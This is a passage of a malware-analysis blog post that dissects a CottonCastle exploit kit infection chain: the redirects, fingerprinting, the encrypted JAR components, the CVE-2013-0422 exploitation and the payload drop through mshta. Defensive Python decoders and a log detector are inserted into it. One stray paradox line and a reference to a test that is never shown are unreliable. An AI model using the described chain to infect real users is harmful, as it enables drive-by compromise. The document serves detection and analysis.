<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgriZQ6-d5B8qly_X8KgOmd7QYkrWh_NOA2KsLeQ7HFltYYv9Lk7B7d6f4CWEPBf3mjXgAuwLT2rWxTmwAm3wRqzkCtr7dDSb2zkBj5IAqI0C28laQd7Rqa-lcbBo0QBLZSZJ4GJHO0_BX/s1600/whois.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgriZQ6-d5B8qly_X8KgOmd7QYkrWh_NOA2KsLeQ7HFltYYv9Lk7B7d6f4CWEPBf3mjXgAuwLT2rWxTmwAm3wRqzkCtr7dDSb2zkBj5IAqI0C28laQd7Rqa-lcbBo0QBLZSZJ4GJHO0_BX/s1600/whois.PNG" height="320" width="214" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">Extract from WHOIS results for '<span style="color: #3d85c6;">leveloped.in</span>'</span></i></div>
<br />
It doesn't appear to be well '<span style="color: #3d85c6;">hidden</span>' for a domain registered with malicious intent, which once again makes me think that this could be just a case of a compromised news/ad feed. Anyway, let's focus on the '<span style="color: #3d85c6;">&lt;iframe&gt;</span>' link that leads to another webpage.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj09yHb8JFUkoNro5hAkVRKtlKEABcc3CUgMl79kK0Dysrf1t7XjsR1-fMlJEhzMTLHeCJJ5aCIVa8Co78WiZwXqnhzwRIpXZPXviwfDZUI7U4V8zDvIe5KMrYxaaPlASqmo6HThGKQ91jW/s1600/second_HTML.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj09yHb8JFUkoNro5hAkVRKtlKEABcc3CUgMl79kK0Dysrf1t7XjsR1-fMlJEhzMTLHeCJJ5aCIVa8Co78WiZwXqnhzwRIpXZPXviwfDZUI7U4V8zDvIe5KMrYxaaPlASqmo6HThGKQ91jW/s1600/second_HTML.PNG" height="146" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">Part of the second HTML page in the redirect chain</span></i></div>
<br />
Note yet another JavaScript URI that looks like a request for an ad banner - '<span style="color: #3d85c6;">static.js?ads-banner=1620850</span>'.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIhMrF95bKZJcpIPiKBjctmg19uGoWNGhDn3ewGrbvzO7qfm0THacRnl3HKglQfYaQtck88DsXsmPyfZ_qnLBYV0S4hsCC2fFc4vadjKyJG5muXezdgEICfN3fgDnmGZULcOFhf-xAFTPK/s1600/JS_EK_landing_redirect.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIhMrF95bKZJcpIPiKBjctmg19uGoWNGhDn3ewGrbvzO7qfm0THacRnl3HKglQfYaQtck88DsXsmPyfZ_qnLBYV0S4hsCC2fFc4vadjKyJG5muXezdgEICfN3fgDnmGZULcOFhf-xAFTPK/s1600/JS_EK_landing_redirect.PNG" height="185" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">Part of JavaScript redirecting to EK landing page</span></i></div>
<br />
'<span style="color: #3d85c6;">Surprisingly</span>', there is no ad banner in the response. Instead it contains a lightly obfuscated JavaScript that compiles the next URL in the redirect chain. It takes a predefined URL, adds the referrer to it and requests the resulting URL.<br />
<br />
This was the last redirect in the chain, so the browser finally arrives on the '<span style="color: #3d85c6;">CottonCastle EK</span>' landing page. Before we proceed with the analysis of the EK parts, let's quickly sum up what we've found so far and speculate a little bit about it. It's hard to tell for sure where the actual badness starts. Technically, it would be fair to say it starts from the very first page we landed on - '<span style="color: #3d85c6;">ru.hellomagazine.com/tags/40-viktoriya_bonya.html</span>', but we should also consider a scenario where the first redirect to '<span style="color: #3d85c6;">leveloped.in/government/70d83bde3d5f7e09/</span>' through the '<span style="color: #3d85c6;">ru.hellomagazine.com/js/jquery.place.min.js?i=1400557776</span>' JavaScript is a normal operational mode for '<span style="color: #3d85c6;">ru.hellomagazine.com</span>' to pull news/advertisement content for its web pages. In that case the news/ad feed is compromised and the badness more likely begins at '<span style="color: #3d85c6;">expokot.com/hilosifipu/static.js?ads-banner=1620850</span>'. On the other hand, all domain names involved in the delivery of news/ad feeds could be part of a well-organised malvertising network, with the redirect-initiating link maliciously injected into '<span style="color: #3d85c6;">ru.hellomagazine.com</span>' website pages. Alright, that's enough speculation.<br />
<br />
<b><span style="color: #3d85c6;">The statement below is true. </span></b><br />
<b><span style="color: #3d85c6;">The statement above is false.</span></b><br />
<br />
The server replies with a 203 HTTP status code when the landing page is requested. Most likely this rather unusual status code is used by the server side of '<span style="color: #3d85c6;">CottonCastle EK</span>' for some internal processing, or it could be specific to this particular sample only. String variables on the landing page are lightly obfuscated.<br />
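From the detection side, two traits described in this post can be checked against proxy logs: a landing page answered with HTTP 203, and a request URL that carries the referring page's URL inside it (the 'static.js' stage appends the referrer). The following is an added Python example, not part of the post; its log lines are constructed, the hosts follow the chain named above, and the landing host and the 'r=' parameter carrying the referrer are placeholders, since the post does not give how the referrer is appended.

```python
import re
from collections import namedtuple
from urllib.parse import parse_qsl, urlsplit

# Added example, not part of the post: rebuild the redirect chain from proxy
# log lines and flag the two traits the post reports for this kit, a landing
# page answered with HTTP 203 and a request URL that carries the referring
# page's URL inside it. The log lines are constructed for the demo; the hosts
# follow the chain named in the post, while the landing host and the 'r='
# parameter used to carry the referrer are placeholders (the real kit's
# parameter name is not given in the post).

SAMPLE_LOG = """\
2014-06-06T10:00:01 10.0.0.5 GET http://ru.hellomagazine.com/tags/40-viktoriya_bonya.html 200 -
2014-06-06T10:00:02 10.0.0.5 GET http://ru.hellomagazine.com/js/jquery.place.min.js?i=1400557776 200 http://ru.hellomagazine.com/tags/40-viktoriya_bonya.html
2014-06-06T10:00:04 10.0.0.5 GET http://leveloped.in/government/70d83bde3d5f7e09/ 200 http://ru.hellomagazine.com/tags/40-viktoriya_bonya.html
2014-06-06T10:00:05 10.0.0.5 GET http://expokot.com/hilosifipu/static.js?ads-banner=1620850 200 http://leveloped.in/government/70d83bde3d5f7e09/
2014-06-06T10:00:06 10.0.0.5 GET http://landing.example.invalid/PLACEHOLDER/?r=http%3A%2F%2Fleveloped.in%2Fgovernment%2F70d83bde3d5f7e09%2F 203 http://leveloped.in/government/70d83bde3d5f7e09/
"""

LogEntry = namedtuple("LogEntry", "ts client method url status referer")


def parse_log(text):
    """Parse whitespace-separated lines: ts client method url status referer ('-' = none)."""
    entries = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, method, url, status, referer = line.split()
        entries.append(LogEntry(ts, client, method, url, int(status),
                                None if referer == "-" else referer))
    return entries


def embedded_urls(url):
    """URLs carried inside another URL's query values or path (the post notes the
    kit appends the referrer to the next hop's URL)."""
    parts = urlsplit(url)
    found = [v for _, v in parse_qsl(parts.query, keep_blank_values=True)
             if re.match(r"https?://", v)]
    found += re.findall(r"https?://[^\s?&]+", parts.path)
    return found


def flag_entries(entries):
    """Return (entry, reasons) for every request matching a trait from the post.
    Each trait is a weak signal on its own; the referer chain gives the context."""
    flagged = []
    for e in entries:
        reasons = []
        if e.status == 203:
            reasons.append("HTTP 203 reply (the landing page in the post was served with it)")
        if e.referer and any(urlsplit(u).netloc == urlsplit(e.referer).netloc
                             for u in embedded_urls(e.url)):
            reasons.append("referring page's URL embedded in the request URL")
        if reasons:
            flagged.append((e, reasons))
    return flagged


def referer_chain(entries, entry):
    """Walk back through Referer headers to the first page; each request has a
    single Referer, so the backward walk is unambiguous."""
    by_url = {e.url: e for e in entries}
    chain, cur, seen = [entry], entry, {entry.url}
    while cur.referer in by_url and cur.referer not in seen:
        cur = by_url[cur.referer]
        seen.add(cur.url)
        chain.append(cur)
    return [e.url for e in reversed(chain)]


def analyse(log_text=SAMPLE_LOG):
    """Flagged requests with their reasons and the chain that led to them."""
    entries = parse_log(log_text)
    return [(e.url, reasons, referer_chain(entries, e))
            for e, reasons in flag_entries(entries)]


if __name__ == "__main__":
    for url, reasons, chain in analyse():
        print(url)
        for r in reasons:
            print("  -", r)
        print("  chain:", " -> ".join(chain))
```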
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjaq_DEJm4Tq3y0ZwpdUty5jFVSJiF0c3eRIrTieuGkZ8FyjxUZapd1pZ6De5BZG__8f7LACJq0AsOXuvZG1tNXoPdS3lf7odSh2MlzzynVjZsuiW6YQhb6M3FSKWfI-U3IcvhN6XRrnZ49/s1600/string_obfuscation_example.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjaq_DEJm4Tq3y0ZwpdUty5jFVSJiF0c3eRIrTieuGkZ8FyjxUZapd1pZ6De5BZG__8f7LACJq0AsOXuvZG1tNXoPdS3lf7odSh2MlzzynVjZsuiW6YQhb6M3FSKWfI-U3IcvhN6XRrnZ49/s1600/string_obfuscation_example.PNG" height="8" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">'<span style="color: #3d85c6;">CottonCastle EK</span>' string obfuscation example</span></i></div>
<br />
On top of that, the code is padded/fragmented by comment blocks.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0dne1-PkLAm6xLFSGMsX_fRRet5xYfOnvHAv4EIWqlYOLzpkdalu5jHaSuGLheSdmK_3_P_Snq1k08sa-XwhH4y-Vgdc2C6IMZPVXQj9_J0Ws225Twtgnj-WJr7a6__8JHiS8yIuQlVoF/s1600/comments_padding.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0dne1-PkLAm6xLFSGMsX_fRRet5xYfOnvHAv4EIWqlYOLzpkdalu5jHaSuGLheSdmK_3_P_Snq1k08sa-XwhH4y-Vgdc2C6IMZPVXQj9_J0Ws225Twtgnj-WJr7a6__8JHiS8yIuQlVoF/s1600/comments_padding.png" height="21" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">'<span style="color: #3d85c6;">CottonCastle EK</span>' comment blocks fragmentation example</span></i></div>
<br />
As a first step, the code will launch an '<span style="color: #3d85c6;">&lt;applet&gt;</span>' containing a Java application.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOoqzgoWdzv6THmLR-IE-ou-btT42iOifaD7I7Wt6DX-GUNaH_kTmfnCLn4sBv2wvw02mwjKi9wOMpDnwbBKIcZC_PrvRPzGpBx1leL1S7JTW2e59TAoloXUSW3e20F8vPwbo0h1uexcOK/s1600/JavaFX_applet.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOoqzgoWdzv6THmLR-IE-ou-btT42iOifaD7I7Wt6DX-GUNaH_kTmfnCLn4sBv2wvw02mwjKi9wOMpDnwbBKIcZC_PrvRPzGpBx1leL1S7JTW2e59TAoloXUSW3e20F8vPwbo0h1uexcOK/s1600/JavaFX_applet.PNG" height="18" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">'<span style="color: #3d85c6;">&lt;applet&gt;</span>' launching the Java application</span></i></div>
<br />
Next, the code will attempt to create a '<span style="color: #3d85c6;">ShockwaveFlash</span>' ActiveXObject and, if successful, identify its version.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_a8nBqWZa92GjixrUMA3H_0wNsXY7ho4Q7cWXv0k9lygIYa-nPpxgldV3bCuw0pc-3gtHUwDD14Vz7UNPU8EE2XYyGbaP0La-koA8Ne3D3VvtVY0DitxF6r-AhumpHOmMuDpKNYFzmWAz/s1600/ShockwaveFlash_ident.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_a8nBqWZa92GjixrUMA3H_0wNsXY7ho4Q7cWXv0k9lygIYa-nPpxgldV3bCuw0pc-3gtHUwDD14Vz7UNPU8EE2XYyGbaP0La-koA8Ne3D3VvtVY0DitxF6r-AhumpHOmMuDpKNYFzmWAz/s1600/ShockwaveFlash_ident.PNG" height="7" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">Part of JavaScript code that creates a '<span style="color: #3d85c6;">ShockwaveFlash</span>' ActiveXObject</span></i></div>
<br />
The returned version value is split into its individual numeric components and stored in an array. The array is then converted into a string by XORing each element with the static key '<span style="color: #3d85c6;">343</span>' and concatenating the results. The resulting string is passed to a function that generates a GET request using a pre-defined URI and the passed ShockwaveFlash version value, plus a number of other pre-defined parameters stored as hex strings.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpFaMzDtciqDk3wplGWjlIyISec09X1Rp4yB8UjIs8dWNy5GQsRQQhsUo8uwsc5EIYJjgbXhZgLXDZekjItX1RAyns0MsvqFgoGIlCuXJ_8klbScLYW8ZxkrnBctTIJ5WWNetGhVJolz3Y/s1600/ShockwaveFlash_request.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpFaMzDtciqDk3wplGWjlIyISec09X1Rp4yB8UjIs8dWNy5GQsRQQhsUo8uwsc5EIYJjgbXhZgLXDZekjItX1RAyns0MsvqFgoGIlCuXJ_8klbScLYW8ZxkrnBctTIJ5WWNetGhVJolz3Y/s1600/ShockwaveFlash_request.PNG" height="26" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">Part of JavaScript generating GET request for a ShockwaveFlash component</span></i></div>
<br />
Just for a little bit of extra fun, we can find out what version of Shockwave Flash Player was installed on the machine this particular sample of '<span style="color: #3d85c6;">CottonCastle EK</span>' was captured from. Here is the part of the GET request corresponding to this sample - '<span style="color: #3d85c6;">/forum/tracker/3/ON/0dc93648889f84dcc7f0f70c25fbe9c6/349.341.456.342/</span>'. If we take each individual numeric value from '<span style="color: #3d85c6;">/349.341.456.342/</span>' and XOR it with '<span style="color: #3d85c6;">343</span>' we get the version of Shockwave Flash Player - '<span style="color: #3d85c6;">10.2.159.1</span>'.<br />
<br />
This particular GET request received an HTTP 409 response. I assume that the server side of '<span style="color: #3d85c6;">CottonCastle EK</span>' responds with the HTTP 409 status code when it decides not to serve the exploit component or when something went wrong sending it.<br />
<br />
Lastly, another JavaScript on the landing page will try to identify the '<span style="color: #3d85c6;">ScriptEngineMajorVersion</span>', '<span style="color: #3d85c6;">ScriptEngineMinorVersion</span>' and '<span style="color: #3d85c6;">ScriptEngineBuildVersion</span>' values. As with the '<span style="color: #3d85c6;">ShockwaveFlash</span>' version values, each of the found values is XORed with '<span style="color: #3d85c6;">343</span>' and the resulting string is passed to a function that generates a GET request using a pre-defined URI and the passed value. The request is triggered by a 2.5 second timer.<br />
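The XOR-with-343 version encoding described above, as an added example that is not part of the original post: a small decoder an analyst can run over proxy log lines to recover the plugin or script engine version the landing page fingerprinted. The '<span style="color: #3d85c6;">/forum/tracker/</span>' path layout is taken from the captured request; the host name and the second log line are constructed for illustration.<br />

```python
"""Decode the XOR-343 version fingerprint embedded in CottonCastle EK GET
requests (added example, not code from the original post or the kit).

The landing page splits a version such as 10.2.159.1 into its numeric
components, XORs each with the static key 343 and joins the results with
dots. XOR is its own inverse, so the same routine recovers the original
version from a captured request. The path layout assumed below is
'/forum/tracker/<n>/<flag>/<32 hex chars>/<encoded version>/', as seen in
the captured sample.
"""
import re

XOR_KEY = 343  # static key used by the landing page script

# Capture group 1 is the encoded dotted-version segment of the tracker path.
TRACKER_RE = re.compile(
    r"/forum/tracker/\d+/[A-Za-z]+/[0-9a-f]{32}/(\d+(?:\.\d+)*)/"
)


def xor_version(segment: str, key: int = XOR_KEY) -> str:
    """XOR every dotted numeric component with `key` and re-join them.

    Works in both directions (encoded -> cleartext and back). A segment that
    is not purely dotted integers raises ValueError instead of being decoded
    into garbage.
    """
    parts = segment.split(".")
    if not all(p.isdigit() for p in parts):
        raise ValueError(f"not a dotted numeric segment: {segment!r}")
    return ".".join(str(int(p) ^ key) for p in parts)


def extract_versions(log_lines):
    """Return (encoded, decoded) pairs for every tracker request in the lines.

    Lines without the tracker path are skipped, so this can be run over an
    unfiltered proxy log.
    """
    results = []
    for line in log_lines:
        match = TRACKER_RE.search(line)
        if match:
            encoded = match.group(1)
            results.append((encoded, xor_version(encoded)))
    return results


# Constructed sample proxy log. The first URI path is the one quoted in the
# post; the second is made up with the same layout; the host is a placeholder.
SAMPLE_LOG = [
    "2014-06-06 10:21:07 GET http://ek.example.invalid/forum/tracker/3/ON/"
    "0dc93648889f84dcc7f0f70c25fbe9c6/349.341.456.342/ 409",
    "2014-06-06 10:21:09 GET http://ek.example.invalid/forum/tracker/3/ON/"
    "0dc93648889f84dcc7f0f70c25fbe9c6/338.351.18521/ 200",
    "2014-06-06 10:21:10 GET http://ek.example.invalid/favicon.ico 404",
]

if __name__ == "__main__":
    for encoded, decoded in extract_versions(SAMPLE_LOG):
        print(f"{encoded:>20} -> {decoded}")  # 349.341.456.342 -> 10.2.159.1
```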
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijqKP8iorTTTVEs-Cak0SB010eQjt6hJvndGKa5YLMu167mA7fl4MhauavwEtHMWWcm3c3fyVa9wpBbIp9D2RZNaAegplyGskBGiz5kWqcQjLRAfWDrDIItJA0VyF4j-a6SOTGO3Z16HCR/s1600/IE_request.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijqKP8iorTTTVEs-Cak0SB010eQjt6hJvndGKa5YLMu167mA7fl4MhauavwEtHMWWcm3c3fyVa9wpBbIp9D2RZNaAegplyGskBGiz5kWqcQjLRAfWDrDIItJA0VyF4j-a6SOTGO3Z16HCR/s1600/IE_request.PNG" height="81" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">Part of JavaScript generating GET request using detected values</span></i></div>
<br />
So, the Java application will be requested and executed first. The request is implemented using a JNLP file.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEglGdYzCnE5OWPDLF0dNPAHrxi86OtzoLdZOJwOJaX1bQXB9AvBm7xcUJeyPnwm9Le605KmgXP5tNKzScfG6sSNgtbMwsl87A3wbbBVOZKhsImYywRn512rC4Dc8cHLzZM1EqFGvaqipix9/s1600/JNLP.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEglGdYzCnE5OWPDLF0dNPAHrxi86OtzoLdZOJwOJaX1bQXB9AvBm7xcUJeyPnwm9Le605KmgXP5tNKzScfG6sSNgtbMwsl87A3wbbBVOZKhsImYywRn512rC4Dc8cHLzZM1EqFGvaqipix9/s1600/JNLP.PNG" height="106" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">'<span style="color: #3d85c6;">CottonCastle EK</span>' Java application JNLP file</span></i></div>
<br />
Surprisingly, the JNLP file has no '<span style="color: #3d85c6;">Security Warning Window</span>' bypass attributes and, interestingly enough, the other attributes are properly named. According to the naming, this Java application is called '<span style="color: #3d85c6;">jBitTorrent Client</span>', provides a '<span style="color: #3d85c6;">Java implementation of the bittorrent protocol</span>' and will run on '<span style="color: #3d85c6;">&lt;j2se version="1.6+" /&gt;</span>'. The execution starts with the '<span style="color: #3d85c6;">com.s</span>' class file. Let's take a look at the JAR file content.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFSaV_UvfuSgm2O6N7Ox_dwZfLol80VTksFq15A4-9ySMeL9Cd6BWMy5N-QZSJ35t9JMI6xk4AOkYNAq3_rfqHHgQjCD3jAYIehktpz989DA60W3WlEpnWY7LOOBDkvHOWCyndW04UOHgl/s1600/JAR_content.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFSaV_UvfuSgm2O6N7Ox_dwZfLol80VTksFq15A4-9ySMeL9Cd6BWMy5N-QZSJ35t9JMI6xk4AOkYNAq3_rfqHHgQjCD3jAYIehktpz989DA60W3WlEpnWY7LOOBDkvHOWCyndW04UOHgl/s1600/JAR_content.PNG" height="320" width="221" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">'<span style="color: #3d85c6;">CottonCastle EK</span>' JAR file structure</span></i></div>
<br />
The two class files '<span style="color: #3d85c6;">s.class</span>' and '<span style="color: #3d85c6;">t.class</span>' contain the '<span style="color: #3d85c6;">wrapper</span>' code. In a nutshell, the code decrypts and loads some of the JAR file components. The '<span style="color: #3d85c6;">.dat</span>' files included in the JAR file serve different purposes:<br />
<ul>
<li>'<span style="color: #3d85c6;">d.dat</span>' - Windows PE executable</li>
<li>'<span style="color: #3d85c6;">j.dat</span>' - operating system reconnaissance, payload download and execution</li>
<li>'<span style="color: #3d85c6;">p.dat</span>' - JVM parameters collector, execution path selector</li>
<li>'<span style="color: #3d85c6;">u.dat</span>' - exploit code for <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0422" rel="nofollow" target="_blank">CVE-2013-0422</a> (JmxMBeanServer)</li>
</ul>
Every '<span style="color: #3d85c6;">.dat</span>' file is RC4 encrypted. The decryption key is stored in the '<span style="color: #3d85c6;">adv</span>' parameter passed to the JVM. In this particular sample it was - '<span style="color: #3d85c6;">OrbitWhite</span>'.<br />
<br />
The Java code is fairly obfuscated. String values are also encrypted with RC4 (using the same key) and stored in hex representation. '<span style="color: #3d85c6;">java.lang.reflect.Method</span>' is used extensively.<br />
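An RC4 helper for the two encryption uses described above (the '<span style="color: #3d85c6;">.dat</span>' components and the hex-encoded string literals), as an added example that is not code from the original post or from the kit. It takes the '<span style="color: #3d85c6;">adv</span>' key as a parameter; the sample ciphertext is constructed by encrypting a known string with '<span style="color: #3d85c6;">OrbitWhite</span>' and is not taken from the sample.<br />

```python
"""RC4 helper for the CottonCastle EK JAR components and string literals
(added example, not code from the original post or the kit).

The post states that every '.dat' file in the JAR, and every string literal
in the Java classes, is RC4 encrypted with the key passed in the 'adv' JVM
parameter ('OrbitWhite' in this sample); the strings are additionally stored
as hex. RC4 is symmetric, so one routine covers both directions. The two
magic-number checks give the analyst a quick signal that the right key was
used before loading the decrypted component anywhere.
"""


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4: key-scheduling algorithm followed by the keystream generator."""
    if not key:
        raise ValueError("RC4 key must not be empty")
    # Key-scheduling algorithm (KSA)
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    # Pseudo-random generation algorithm (PRGA), keystream XORed into data
    out = bytearray(len(data))
    i = j = 0
    for n, byte in enumerate(data):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out[n] = byte ^ s[(s[i] + s[j]) & 0xFF]
    return bytes(out)


def decrypt_component(blob: bytes, key: str = "OrbitWhite") -> bytes:
    """Decrypt one '.dat' component (d.dat, j.dat, p.dat, u.dat) with the JVM key."""
    return rc4(key.encode("latin-1"), blob)


def decrypt_hex_string(hex_literal: str, key: str = "OrbitWhite") -> str:
    """Decrypt one hex-encoded string literal from the obfuscated Java classes."""
    return rc4(key.encode("latin-1"), bytes.fromhex(hex_literal)).decode("latin-1")


def encrypt_to_hex(plaintext: str, key: str = "OrbitWhite") -> str:
    """Inverse of decrypt_hex_string; used here only to build the constructed sample."""
    return rc4(key.encode("latin-1"), plaintext.encode("latin-1")).hex()


def looks_like_class_file(blob: bytes) -> bool:
    """Sanity check for a decrypted p.dat: Java class files start with 0xCAFEBABE."""
    return blob[:4] == b"\xca\xfe\xba\xbe"


def looks_like_pe(blob: bytes) -> bool:
    """Sanity check for a decrypted d.dat: Windows PE files start with 'MZ'."""
    return blob[:2] == b"MZ"


if __name__ == "__main__":
    # Constructed sample: a string the post mentions, encrypted with the sample key.
    sample_hex = encrypt_to_hex("java.lang.reflect.Method")
    print(sample_hex, "->", decrypt_hex_string(sample_hex))
```

The two known-answer vectors in the test are the public RC4 vectors ("Key"/"Plaintext" and "Wiki"/"pedia"), so a wrong KSA or PRGA fails immediately rather than producing silent garbage.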
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigHMmy2QQvyo-C0l1eLLAoaidm3DiIgtYvSywghJ5Oh7NyAwPf9xjAq-wzFfMkxEaW1LIBERe7roPw7XaoOMVkoPbHWB_kIjZPRWAdRIDecIQh6nuHX9W9nasE-M2eOQzxcejqiMYR9kOJ/s1600/JAR_string_obfuscation_example.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigHMmy2QQvyo-C0l1eLLAoaidm3DiIgtYvSywghJ5Oh7NyAwPf9xjAq-wzFfMkxEaW1LIBERe7roPw7XaoOMVkoPbHWB_kIjZPRWAdRIDecIQh6nuHX9W9nasE-M2eOQzxcejqiMYR9kOJ/s1600/JAR_string_obfuscation_example.PNG" height="18" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">Example of obfuscated string values</span></i></div>
<br />
The execution flow is the following:<br />
<ol>
<li>'<span style="color: #3d85c6;">wrapper</span>' initialization</li>
<li>'<span style="color: #3d85c6;">wrapper</span>' decrypts '<span style="color: #3d85c6;">u.dat</span>' file and passes it to '<span style="color: #3d85c6;">javax.script.ScriptEngineManager</span>'</li>
<li>the JavaScript decrypted from '<span style="color: #3d85c6;">u.dat</span>' exploits '<span style="color: #3d85c6;">CVE-2013-0422</span>'</li>
<li>'<span style="color: #3d85c6;">wrapper</span>' decrypts '<span style="color: #3d85c6;">p.dat</span>' and loads it as a class file</li>
<li>the '<span style="color: #3d85c6;">p.dat</span>' class file gathers the parameters passed to the JVM, decrypts the '<span style="color: #3d85c6;">j.dat</span>' file and passes it to '<span style="color: #3d85c6;">javax.script.ScriptEngineManager</span>'</li>
<li>'<span style="color: #3d85c6;">j.dat</span>' JavaScript collects values of some OS parameters, decrypts and drops the payload stored in '<span style="color: #3d85c6;">d.dat</span>' file</li>
<li>'<span style="color: #3d85c6;">j.dat</span>' JavaScript downloads a VB script and executes it</li>
<li>the VB script checks for the presence of AV, downloads an executable file, decrypts, stores and executes it</li>
<li>'<span style="color: #3d85c6;">j.dat</span>' JavaScript deletes all the cache and temp files created during the execution</li>
</ol>
<div>
Let's pick it up at step 6: the '<span style="color: #3d85c6;">j.dat</span>' JavaScript decrypts the '<span style="color: #3d85c6;">d.dat</span>' file and attempts to save it into the folder specified by the '<span style="color: #3d85c6;">allusersprofile</span>' environment variable. The new filename for the '<span style="color: #3d85c6;">d.dat</span>' file will be '<span style="color: #3d85c6;">java.dll</span>'. If the script fails to save the file under '<span style="color: #3d85c6;">allusersprofile</span>', it saves it into the folder specified by the '<span style="color: #3d85c6;">temp</span>' environment variable.</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwfbAkAO3Z-I8q_pZYh-s57m0FEu6ACzT0RQxja9sWUi62Ynwg-fhvXiwSjslb8Y7-kr_fbPxujA2Pdhub_FRQet7Fi-AFbSYol5Lv6g9ncv7kOJtQA3WWACl0yPz9xUDjAqlDRzJ0Sv0z/s1600/d_dat_handling_method.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwfbAkAO3Z-I8q_pZYh-s57m0FEu6ACzT0RQxja9sWUi62Ynwg-fhvXiwSjslb8Y7-kr_fbPxujA2Pdhub_FRQet7Fi-AFbSYol5Lv6g9ncv7kOJtQA3WWACl0yPz9xUDjAqlDRzJ0Sv0z/s1600/d_dat_handling_method.PNG" height="109" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">Part of '<span style="color: #3d85c6;">j.dat</span>' JavaScript that handles '<span style="color: #3d85c6;">d.dat</span>' file</span></i></div>
<div>
<br /></div>
<div>
After that, the script decrypts the value stored in the '<span style="color: #3d85c6;">session</span>' variable that was pre-loaded by the '<span style="color: #3d85c6;">p.dat</span>' file. The decrypted value is the URL of an HTML page containing an encoded VB script. The page is downloaded and processed by the '<span style="color: #3d85c6;">mshta</span>' tool.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
